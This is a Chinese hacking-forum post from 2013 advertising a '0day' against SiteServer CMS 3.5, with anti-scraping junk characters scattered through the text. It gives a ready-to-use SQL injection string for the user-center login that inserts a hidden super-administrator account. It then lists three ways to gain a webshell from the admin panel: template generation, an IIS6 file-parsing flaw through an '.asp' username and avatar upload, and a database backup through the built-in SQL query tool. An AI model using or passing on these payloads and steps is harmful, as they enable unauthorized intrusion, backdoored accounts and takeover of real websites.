找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2260|回复: 0
打印 上一主题 下一主题

SiteServer CMS 0Day

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-11 21:10:58 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
经测试秒杀最新的3.5版
, F, m6 l, n  C9 N
  N8 S( q1 h, ^" Q) }1 H. Q8 B4 mstieserver官网:www.siteserver.cn( n7 ]3 w; _# M& F& d4 y
5 m. _$ w/ V5 t2 ~4 Z: m; h5 O" n

% k5 I, G6 |" e' ~9 v: r! g' P! ~9 Q4 l8 Y  x  j; E6 A# q5 I% R
EXP:7 K$ Z) }$ k% b( p4 i! S. Z4 H' `
" W# `. e1 |. P# j- I' ^4 R) B! B7 @
直接访问UserCenter/login.aspx
$ S% X. ^9 ?* F8 i9 t7 |
. m9 U+ @' C$ ]
: T! m7 T. g& P8 V* u/ |  l
+ U6 w4 G% m, z# ?; B9 E# T' g$ H用户名处输入:  n& V+ ^1 U- T( y  ?
& @; t+ W5 v* S7 s% q6 A# f
123'insert into bairong_Administrator([UserName],[Password],[PasswordFormat],[PasswordSalt]) values('blue','VffSUZcBPo4=','Encrypted','i7jq4LwC25wKDoqHErBWaw==');insert into bairong_AdministratorsInRoles values('Administrator','blue');insert into bairong_AdministratorsInRoles values('RegisteredUser','blue');insert into bairong_AdministratorsInRoles values('ConsoleAdministrator','blue');--
) N: I  m! d# ]  T" }4 d" s" K5 [. u6 Y" |8 _1 W9 r: e

& U1 h2 e3 s. W" ?) c
* T9 u- {0 X4 h. A. `; C. B密码为空,输入验证码后提交,既可向数据库中插入一个用户名为blue  密码为lanhai的超级用户。
- Z* e  x* _+ J. i
4 S/ J) U# o8 t, {& y& O+ f ) O' [0 H' f* H3 m

- a( W5 @% m3 x- g2 F  @之后再访问后台SiteServer/login.aspx用插入的用户登陆
0 g2 A; y% r# A" A# W: r  k1 K1 j! n; J( J0 p% n7 C
# H/ |% ^4 b$ A6 }7 _% K. j
3 [9 p2 H2 Q5 l7 d  U
后台拿webshell的三种方法:
! V4 n9 o# t6 I# N2 T* b* }0 S/ A9 }3 D8 i
一、
( z3 ]$ y+ ?: c* f5 r, D0 M. C( s  F
站点管理-》显示功能-》模板管理-》添加单页模板-》直接生成aspx
% o, q+ s& u3 G+ B1 U$ q/ e7 S0 h" ]: ^7 A7 `/ K! q5 H
二、  A/ e8 X% y9 ?% ]) L
5 o* M2 s  l2 Q. K9 G- e
成员权限-》添加用户-》用户名为:1.asp
: D! A3 A3 T3 L& i' x, S) @5 K3 H/ c
http://127.0.0.1/usercenter/! W+ q( Q9 x! V
9 o  M" J& R$ s
用刚才添加的1.asp去登陆,进去之后上传个人头像,利用IIS6解析漏洞得webshell9 Q& c% n$ }. X  h. {
' H$ e( t( w) X% }* h* y
(ps:后台添加用户时不会验证是否含有非法字符)
/ X& O- d9 U5 {- b+ d* L
7 s2 ~$ H3 c& M$ H' K三、5 I1 F3 ~# ^( P. ?
1 I' F! ]. K- u6 X9 b
系统工具-》实用工具-》机器参数查看# h  Q. r0 k% k3 F3 V
可以看到数据库类型、名称,WEB路径; J: H6 F4 C! e  \* j: o
( N, H! B8 Y# G! }
系统工具-》数据库工具-》SQL语句查询8 ?& s- B3 H" Q+ Q( \; N, e
这功能做的不错,直接就相当于一个查询分析器,什么回显都有,可以backup得webshell,或者利用sqlserver配置不当直接XXOO。9 s* H4 v4 h7 s2 s
: _4 L/ A+ N  @7 }' r8 K; G# V' I0 f  |
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表